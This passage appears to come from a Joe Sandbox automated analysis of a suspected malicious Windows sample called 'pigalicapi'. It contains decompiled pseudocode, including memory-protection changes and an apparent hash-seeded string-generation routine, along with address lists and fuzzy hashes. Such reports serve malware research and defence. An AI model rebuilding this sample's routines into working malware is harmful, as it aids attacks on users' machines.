                                                                                                                                                                                                                                                                                                        																goto L30;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_v88 = _t100;
                                                                                                                                                                                                                                                                                                        																 *_t147 = "  Unknown pseudo relocation bit size %d.\n";
                                                                                                                                                                                                                                                                                                        																_v56 = 0;
                                                                                                                                                                                                                                                                                                        																_t70 = L0040CE20(_t94, _t100, _t114, _t121, _t138);
                                                                                                                                                                                                                                                                                                        																goto L14;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													goto L37;
                                                                                                                                                                                                                                                                                                        													L30:
                                                                                                                                                                                                                                                                                                        													_t94 = _t94 + 0xc;
                                                                                                                                                                                                                                                                                                        													__eflags = _t94 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        												} while (_t94 < 0x4219b4);
                                                                                                                                                                                                                                                                                                        												L19:
                                                                                                                                                                                                                                                                                                        												_t70 =  *0x422070; // 0x1
                                                                                                                                                                                                                                                                                                        												_t93 = 0;
                                                                                                                                                                                                                                                                                                        												__eflags = _t70;
                                                                                                                                                                                                                                                                                                        												if(_t70 > 0) {
                                                                                                                                                                                                                                                                                                        													do {
                                                                                                                                                                                                                                                                                                        														_t74 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        														_t130 = _t93 + _t93 * 2;
                                                                                                                                                                                                                                                                                                        														_t119 = _t130 * 4;
                                                                                                                                                                                                                                                                                                        														_t70 = _t74 + _t119;
                                                                                                                                                                                                                                                                                                        														_t109 =  *_t70;
                                                                                                                                                                                                                                                                                                        														__eflags =  *_t70;
                                                                                                                                                                                                                                                                                                        														if( *_t70 == 0) {
                                                                                                                                                                                                                                                                                                        															goto L21;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_v84 = 0x1c;
                                                                                                                                                                                                                                                                                                        															_v88 = _v64;
                                                                                                                                                                                                                                                                                                        															_t29 = _t70 + 4; // 0x418aa0
                                                                                                                                                                                                                                                                                                        															 *_t147 =  *_t29;
                                                                                                                                                                                                                                                                                                        															_t76 = VirtualQuery(??, ??, ??);
                                                                                                                                                                                                                                                                                                        															_t147 = _t147 - 0xc;
                                                                                                                                                                                                                                                                                                        															__eflags = _t76;
                                                                                                                                                                                                                                                                                                        															if(_t76 == 0) {
                                                                                                                                                                                                                                                                                                        																_t98 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        																_t95 = _t98 + _t119;
                                                                                                                                                                                                                                                                                                        																__eflags = _t95;
                                                                                                                                                                                                                                                                                                        																_t55 = _t95 + 4; // 0x418aa0
                                                                                                                                                                                                                                                                                                        																_v84 =  *_t55;
                                                                                                                                                                                                                                                                                                        																_t57 = _t95 + 8; // 0x41910c
                                                                                                                                                                                                                                                                                                        																_t58 =  *_t57 + 8; // 0x10d00ff
                                                                                                                                                                                                                                                                                                        																 *_t147 = "  VirtualQuery failed for %d bytes at address %p";
                                                                                                                                                                                                                                                                                                        																_v88 =  *_t58;
                                                                                                                                                                                                                                                                                                        																_t80 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
                                                                                                                                                                                                                                                                                                        																goto L35;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_v80 =  &_v60;
                                                                                                                                                                                                                                                                                                        																_t83 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        																_v84 =  *((intOrPtr*)(_t83 + _t130 * 4));
                                                                                                                                                                                                                                                                                                        																_v88 = _v44;
                                                                                                                                                                                                                                                                                                        																 *_t147 = _v56; // executed
                                                                                                                                                                                                                                                                                                        																_t70 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        																_t147 = _t147 - 0x10;
                                                                                                                                                                                                                                                                                                        																goto L21;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														goto L37;
                                                                                                                                                                                                                                                                                                        														L21:
                                                                                                                                                                                                                                                                                                        														_t93 = _t93 + 1;
                                                                                                                                                                                                                                                                                                        														__eflags = _t93 -  *0x422070; // 0x1
                                                                                                                                                                                                                                                                                                        													} while (__eflags < 0);
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											goto L14;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return _t61;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L37:
                                                                                                                                                                                                                                                                                                        			}



































                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c7
                                                                                                                                                                                                                                                                                                        0x0040d0d3
                                                                                                                                                                                                                                                                                                        0x0040d0d4
                                                                                                                                                                                                                                                                                                        0x0040d0d9
                                                                                                                                                                                                                                                                                                        0x0040d0f5
                                                                                                                                                                                                                                                                                                        0x0040d0fa
                                                                                                                                                                                                                                                                                                        0x0040d104
                                                                                                                                                                                                                                                                                                        0x0040d10d
                                                                                                                                                                                                                                                                                                        0x0040d117
                                                                                                                                                                                                                                                                                                        0x0040d11c
                                                                                                                                                                                                                                                                                                        0x0040d11f
                                                                                                                                                                                                                                                                                                        0x0040d1c1
                                                                                                                                                                                                                                                                                                        0x0040d1c8
                                                                                                                                                                                                                                                                                                        0x0040d125
                                                                                                                                                                                                                                                                                                        0x0040d125
                                                                                                                                                                                                                                                                                                        0x0040d128
                                                                                                                                                                                                                                                                                                        0x0040d293
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d12e
                                                                                                                                                                                                                                                                                                        0x0040d12e
                                                                                                                                                                                                                                                                                                        0x0040d133
                                                                                                                                                                                                                                                                                                        0x0040d135
                                                                                                                                                                                                                                                                                                        0x0040d1c9
                                                                                                                                                                                                                                                                                                        0x0040d1c9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d13b
                                                                                                                                                                                                                                                                                                        0x0040d13b
                                                                                                                                                                                                                                                                                                        0x0040d140
                                                                                                                                                                                                                                                                                                        0x0040d142
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d148
                                                                                                                                                                                                                                                                                                        0x0040d148
                                                                                                                                                                                                                                                                                                        0x0040d14e
                                                                                                                                                                                                                                                                                                        0x0040d153
                                                                                                                                                                                                                                                                                                        0x0040d155
                                                                                                                                                                                                                                                                                                        0x0040d298
                                                                                                                                                                                                                                                                                                        0x0040d298
                                                                                                                                                                                                                                                                                                        0x0040d29a
                                                                                                                                                                                                                                                                                                        0x0040d29c
                                                                                                                                                                                                                                                                                                        0x0040d1ce
                                                                                                                                                                                                                                                                                                        0x0040d1ce
                                                                                                                                                                                                                                                                                                        0x0040d1d4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1d6
                                                                                                                                                                                                                                                                                                        0x0040d1d9
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e8
                                                                                                                                                                                                                                                                                                        0x0040d1eb
                                                                                                                                                                                                                                                                                                        0x0040d1f1
                                                                                                                                                                                                                                                                                                        0x0040d1f7
                                                                                                                                                                                                                                                                                                        0x0040d1fa
                                                                                                                                                                                                                                                                                                        0x0040d200
                                                                                                                                                                                                                                                                                                        0x0040d205
                                                                                                                                                                                                                                                                                                        0x0040d205
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a5
                                                                                                                                                                                                                                                                                                        0x0040d2a7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ad
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ad
                                                                                                                                                                                                                                                                                                        0x0040d2a7
                                                                                                                                                                                                                                                                                                        0x0040d15b
                                                                                                                                                                                                                                                                                                        0x0040d15b
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d163
                                                                                                                                                                                                                                                                                                        0x0040d166
                                                                                                                                                                                                                                                                                                        0x0040d383
                                                                                                                                                                                                                                                                                                        0x0040d383
                                                                                                                                                                                                                                                                                                        0x0040d387
                                                                                                                                                                                                                                                                                                        0x0040d38e
                                                                                                                                                                                                                                                                                                        0x0040d399
                                                                                                                                                                                                                                                                                                        0x0040d39d
                                                                                                                                                                                                                                                                                                        0x0040d3a0
                                                                                                                                                                                                                                                                                                        0x0040d3a2
                                                                                                                                                                                                                                                                                                        0x0040d16c
                                                                                                                                                                                                                                                                                                        0x0040d16c
                                                                                                                                                                                                                                                                                                        0x0040d16f
                                                                                                                                                                                                                                                                                                        0x0040d175
                                                                                                                                                                                                                                                                                                        0x0040d177
                                                                                                                                                                                                                                                                                                        0x0040d177
                                                                                                                                                                                                                                                                                                        0x0040d179
                                                                                                                                                                                                                                                                                                        0x0040d179
                                                                                                                                                                                                                                                                                                        0x0040d182
                                                                                                                                                                                                                                                                                                        0x0040d182
                                                                                                                                                                                                                                                                                                        0x0040d188
                                                                                                                                                                                                                                                                                                        0x0040d18b
                                                                                                                                                                                                                                                                                                        0x0040d18b
                                                                                                                                                                                                                                                                                                        0x0040d18f
                                                                                                                                                                                                                                                                                                        0x0040d192
                                                                                                                                                                                                                                                                                                        0x0040d2b2
                                                                                                                                                                                                                                                                                                        0x0040d2b9
                                                                                                                                                                                                                                                                                                        0x0040d2c4
                                                                                                                                                                                                                                                                                                        0x0040d2c7
                                                                                                                                                                                                                                                                                                        0x0040d2cd
                                                                                                                                                                                                                                                                                                        0x0040d2d2
                                                                                                                                                                                                                                                                                                        0x0040d2d8
                                                                                                                                                                                                                                                                                                        0x0040d2e3
                                                                                                                                                                                                                                                                                                        0x0040d2e3
                                                                                                                                                                                                                                                                                                        0x0040d2e5
                                                                                                                                                                                                                                                                                                        0x0040d2e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d198
                                                                                                                                                                                                                                                                                                        0x0040d198
                                                                                                                                                                                                                                                                                                        0x0040d19b
                                                                                                                                                                                                                                                                                                        0x0040d345
                                                                                                                                                                                                                                                                                                        0x0040d34f
                                                                                                                                                                                                                                                                                                        0x0040d354
                                                                                                                                                                                                                                                                                                        0x0040d357
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1a1
                                                                                                                                                                                                                                                                                                        0x0040d1a1
                                                                                                                                                                                                                                                                                                        0x0040d1a4
                                                                                                                                                                                                                                                                                                        0x0040d301
                                                                                                                                                                                                                                                                                                        0x0040d304
                                                                                                                                                                                                                                                                                                        0x0040d30f
                                                                                                                                                                                                                                                                                                        0x0040d311
                                                                                                                                                                                                                                                                                                        0x0040d317
                                                                                                                                                                                                                                                                                                        0x0040d31d
                                                                                                                                                                                                                                                                                                        0x0040d322
                                                                                                                                                                                                                                                                                                        0x0040d324
                                                                                                                                                                                                                                                                                                        0x0040d32f
                                                                                                                                                                                                                                                                                                        0x0040d332
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1aa
                                                                                                                                                                                                                                                                                                        0x0040d1aa
                                                                                                                                                                                                                                                                                                        0x0040d1ae
                                                                                                                                                                                                                                                                                                        0x0040d1b5
                                                                                                                                                                                                                                                                                                        0x0040d1bc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1bc
                                                                                                                                                                                                                                                                                                        0x0040d1a4
                                                                                                                                                                                                                                                                                                        0x0040d19b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ed
                                                                                                                                                                                                                                                                                                        0x0040d2ed
                                                                                                                                                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                                                                                                                                                        0x0040d20d
                                                                                                                                                                                                                                                                                                        0x0040d20d
                                                                                                                                                                                                                                                                                                        0x0040d212
                                                                                                                                                                                                                                                                                                        0x0040d214
                                                                                                                                                                                                                                                                                                        0x0040d216
                                                                                                                                                                                                                                                                                                        0x0040d22b
                                                                                                                                                                                                                                                                                                        0x0040d22b
                                                                                                                                                                                                                                                                                                        0x0040d230
                                                                                                                                                                                                                                                                                                        0x0040d233
                                                                                                                                                                                                                                                                                                        0x0040d23a
                                                                                                                                                                                                                                                                                                        0x0040d23c
                                                                                                                                                                                                                                                                                                        0x0040d23e
                                                                                                                                                                                                                                                                                                        0x0040d240
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d242
                                                                                                                                                                                                                                                                                                        0x0040d245
                                                                                                                                                                                                                                                                                                        0x0040d24d
                                                                                                                                                                                                                                                                                                        0x0040d251
                                                                                                                                                                                                                                                                                                        0x0040d254
                                                                                                                                                                                                                                                                                                        0x0040d257
                                                                                                                                                                                                                                                                                                        0x0040d25d
                                                                                                                                                                                                                                                                                                        0x0040d260
                                                                                                                                                                                                                                                                                                        0x0040d262
                                                                                                                                                                                                                                                                                                        0x0040d35e
                                                                                                                                                                                                                                                                                                        0x0040d364
                                                                                                                                                                                                                                                                                                        0x0040d364
                                                                                                                                                                                                                                                                                                        0x0040d366
                                                                                                                                                                                                                                                                                                        0x0040d369
                                                                                                                                                                                                                                                                                                        0x0040d36d
                                                                                                                                                                                                                                                                                                        0x0040d370
                                                                                                                                                                                                                                                                                                        0x0040d373
                                                                                                                                                                                                                                                                                                        0x0040d37a
                                                                                                                                                                                                                                                                                                        0x0040d37e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d268
                                                                                                                                                                                                                                                                                                        0x0040d26b
                                                                                                                                                                                                                                                                                                        0x0040d26f
                                                                                                                                                                                                                                                                                                        0x0040d277
                                                                                                                                                                                                                                                                                                        0x0040d27e
                                                                                                                                                                                                                                                                                                        0x0040d285
                                                                                                                                                                                                                                                                                                        0x0040d288
                                                                                                                                                                                                                                                                                                        0x0040d28e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d28e
                                                                                                                                                                                                                                                                                                        0x0040d262
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d220
                                                                                                                                                                                                                                                                                                        0x0040d220
                                                                                                                                                                                                                                                                                                        0x0040d223
                                                                                                                                                                                                                                                                                                        0x0040d223
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d218
                                                                                                                                                                                                                                                                                                        0x0040d216
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d175
                                                                                                                                                                                                                                                                                                        0x0040d166
                                                                                                                                                                                                                                                                                                        0x0040d155
                                                                                                                                                                                                                                                                                                        0x0040d142
                                                                                                                                                                                                                                                                                                        0x0040d135
                                                                                                                                                                                                                                                                                                        0x0040d128
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
                                                                                                                                                                                                                                                                                                        • Instruction ID: c9f2d9c8f812e7c608e2c1f9d0c6a3859adaa46158f161601ba7db1d9c1a457c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F719F71E012149FCB14CFA9E9807ADB7F1EF44304F54827BE845AB3A5DB389949CB89
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memsetrealloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3488966140-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1e92ba9ca6738bd07df40508bbb0f1f8677d13f166ee6327e985d8f32876cbf7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E411C703003059FD720DF2ADA80B9A77E4EB45744F84452AEA59CB375E779E881CB58
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E9400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v91;
                                                                                                                                                                                                                                                                                                        				char _v92;
                                                                                                                                                                                                                                                                                                        				char _v220;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                                        					_t56 = E024E7B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                                                        					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                                        					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                                                        						E024E7D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                                                        						_t59 = E024E8BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                                                        						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v40 = _t59;
                                                                                                                                                                                                                                                                                                        						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v220;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                                        						E024E9650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                                                        						E024E7D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                                                        						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                                                        						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                                                        						_v91 = 0;
                                                                                                                                                                                                                                                                                                        						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                                                        						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x024e9409
                                                                                                                                                                                                                                                                                                        0x024e9414
                                                                                                                                                                                                                                                                                                        0x024e943d
                                                                                                                                                                                                                                                                                                        0x024e9442
                                                                                                                                                                                                                                                                                                        0x024e9451
                                                                                                                                                                                                                                                                                                        0x024e9454
                                                                                                                                                                                                                                                                                                        0x024e9466
                                                                                                                                                                                                                                                                                                        0x024e9480
                                                                                                                                                                                                                                                                                                        0x024e949a
                                                                                                                                                                                                                                                                                                        0x024e949f
                                                                                                                                                                                                                                                                                                        0x024e94a2
                                                                                                                                                                                                                                                                                                        0x024e94a9
                                                                                                                                                                                                                                                                                                        0x024e94bf
                                                                                                                                                                                                                                                                                                        0x024e94ab
                                                                                                                                                                                                                                                                                                        0x024e94b1
                                                                                                                                                                                                                                                                                                        0x024e94b1
                                                                                                                                                                                                                                                                                                        0x024e94d1
                                                                                                                                                                                                                                                                                                        0x024e94ed
                                                                                                                                                                                                                                                                                                        0x024e94fd
                                                                                                                                                                                                                                                                                                        0x024e9502
                                                                                                                                                                                                                                                                                                        0x024e9513
                                                                                                                                                                                                                                                                                                        0x024e9519
                                                                                                                                                                                                                                                                                                        0x024e9521
                                                                                                                                                                                                                                                                                                        0x024e9533
                                                                                                                                                                                                                                                                                                        0x024e953c
                                                                                                                                                                                                                                                                                                        0x024e9545
                                                                                                                                                                                                                                                                                                        0x024e9460
                                                                                                                                                                                                                                                                                                        0x024e9463
                                                                                                                                                                                                                                                                                                        0x024e9463
                                                                                                                                                                                                                                                                                                        0x024e9466
                                                                                                                                                                                                                                                                                                        0x024e9553

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: GetLastError.KERNEL32 ref: 024E8C09
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 024E9513
                                                                                                                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 024E9521
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1636e05cfdbdf8368fb59674020cc684270e96cc4f47b15cfc626c6f7eefa318
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4d684f3afe434b2527a93fe681e31a761469c02c0948fa06eab4c52e121067f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1636e05cfdbdf8368fb59674020cc684270e96cc4f47b15cfc626c6f7eefa318
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C64109B1D00248EBEF04DF95C881BEEBBB5EF58305F10855AD516AB281E734A685CF90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

